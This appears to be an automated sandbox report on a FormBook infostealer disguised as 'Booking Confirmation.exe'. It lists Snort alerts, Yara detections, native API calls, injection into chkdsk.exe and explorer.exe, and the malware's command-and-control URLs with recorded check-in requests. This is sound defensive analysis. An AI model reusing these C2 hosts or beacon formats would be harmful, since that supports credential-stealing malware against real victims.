Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.evolvekitchendesign.com/ffw/

Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.buehne.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.praktijkinfinity.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.localmoversuae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.buehne.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.praktijkinfinity.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.localmoversuae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.buehne.cloud

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 08:38:10 GMTServer: Apache/2Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 0d 0a 38 62 0d 0a 2f 66 66 77 2f 3f 4d 5a 67 38 3d 51 74 71 54 77 32 47 79 59 78 66 32 57 79 52 46 74 70 6d 53 6d 4a 4a 76 68 6e 72 77 30 33 75 4e 52 4f 74 53 79 64 59 6e 4a 6b 33 4a 44 52 69 59 6b 36 62 73 76 58 57 67 74 75 66 35 74 6c 45 4a 63 4d 4e 2b 26 61 6d 70 3b 75 54 78 58 63 3d 6f 6a 4f 30 64 4a 4b 30 48 76 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 0d 0a 31 32 62 0d 0a 77 77 77 2e 70 72 61 6b 74 69 6a 6b 69 6e 66 69 6e 69 74 79 2e 6f 6e 6c 69 6e 65 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 90<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL 8b/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv was not found on this server.<HR><I>12bwww.praktijkinfinity.online</I></BODY></HTML>0

Source: Booking Confirmation.exe, 00000000.00000003.650111317.0000000005725000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000002.914045803.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Booking Confirmation.exe, 00000000.00000003.653249672.0000000005728000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.como.
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.651977805.0000000005727000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.652187363.0000000005726000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnE
Source: Booking Confirmation.exe, 00000000.00000003.651858652.000000000572E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnht
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.come
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coms
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comt
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Booking Confirmation.exe, 00000000.00000003.651298106.000000000573B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comym
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Show sources

Source: Booking Confirmation.exe, LogIn.cs	Long String: Length: 13656
Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, LogIn.cs	Long String: Length: 13656

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419D60 NtCreateFile,	5_2_00419D60
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419E10 NtReadFile,	5_2_00419E10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419E90 NtClose,	5_2_00419E90
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,	5_2_00419F40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419D62 NtCreateFile,	5_2_00419D62
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419D1C NtCreateFile,	5_2_00419D1C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419DB2 NtReadFile,	5_2_00419DB2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419E0A NtReadFile,	5_2_00419E0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A99A0 NtCreateSection,LdrInitializeThunk,	5_2_018A99A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_018A9910
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A98F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_018A98F0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9840 NtDelayExecution,LdrInitializeThunk,	5_2_018A9840
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_018A9860
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_018A9A00
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A20 NtResumeThread,LdrInitializeThunk,	5_2_018A9A20
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A50 NtCreateFile,LdrInitializeThunk,	5_2_018A9A50
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A95D0 NtClose,LdrInitializeThunk,	5_2_018A95D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9540 NtReadFile,LdrInitializeThunk,	5_2_018A9540
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9780 NtMapViewOfSection,LdrInitializeThunk,	5_2_018A9780
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A97A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_018A97A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9710 NtQueryInformationToken,LdrInitializeThunk,	5_2_018A9710
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A96E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_018A96E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_018A9660
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A99D0 NtCreateProcessEx,	5_2_018A99D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9950 NtQueueApcThread,	5_2_018A9950
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A98A0 NtWriteVirtualMemory,	5_2_018A98A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9820 NtEnumerateKey,	5_2_018A9820
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AB040 NtSuspendThread,	5_2_018AB040
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AA3B0 NtGetContextThread,	5_2_018AA3B0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9B00 NtSetValueKey,	5_2_018A9B00
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A80 NtOpenDirectoryObject,	5_2_018A9A80
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A10 NtQuerySection,	5_2_018A9A10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A95F0 NtQueryInformationFile,	5_2_018A95F0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9520 NtWaitForSingleObject,	5_2_018A9520
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AAD30 NtSetContextThread,	5_2_018AAD30
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9560 NtWriteFile,	5_2_018A9560
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9FE0 NtCreateMutant,	5_2_018A9FE0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AA710 NtOpenProcessToken,	5_2_018AA710
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9730 NtQueryVirtualMemory,	5_2_018A9730
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9760 NtOpenProcess,	5_2_018A9760
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AA770 NtOpenThread,	5_2_018AA770
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9770 NtSetInformationFile,	5_2_018A9770
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A96D0 NtCreateKey,	5_2_018A96D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9610 NtEnumerateValueKey,	5_2_018A9610
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9650 NtQueryValueKey,	5_2_018A9650
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9670 NtQueryInformationProcess,	5_2_018A9670
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D295D0 NtClose,LdrInitializeThunk,	8_2_04D295D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29540 NtReadFile,LdrInitializeThunk,	8_2_04D29540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D296D0 NtCreateKey,LdrInitializeThunk,	8_2_04D296D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D296E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_04D296E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29650 NtQueryValueKey,LdrInitializeThunk,	8_2_04D29650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_04D29660
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29FE0 NtCreateMutant,LdrInitializeThunk,	8_2_04D29FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29780 NtMapViewOfSection,LdrInitializeThunk,	8_2_04D29780
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29710 NtQueryInformationToken,LdrInitializeThunk,	8_2_04D29710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29840 NtDelayExecution,LdrInitializeThunk,	8_2_04D29840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_04D29860
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D299A0 NtCreateSection,LdrInitializeThunk,	8_2_04D299A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_04D29910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A50 NtCreateFile,LdrInitializeThunk,	8_2_04D29A50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D295F0 NtQueryInformationFile,	8_2_04D295F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29560 NtWriteFile,	8_2_04D29560
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2AD30 NtSetContextThread,	8_2_04D2AD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29520 NtWaitForSingleObject,	8_2_04D29520
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29670 NtQueryInformationProcess,	8_2_04D29670
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29610 NtEnumerateValueKey,	8_2_04D29610
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D297A0 NtUnmapViewOfSection,	8_2_04D297A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2A770 NtOpenThread,	8_2_04D2A770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29770 NtSetInformationFile,	8_2_04D29770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29760 NtOpenProcess,	8_2_04D29760
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2A710 NtOpenProcessToken,	8_2_04D2A710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29730 NtQueryVirtualMemory,	8_2_04D29730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D298F0 NtReadVirtualMemory,	8_2_04D298F0
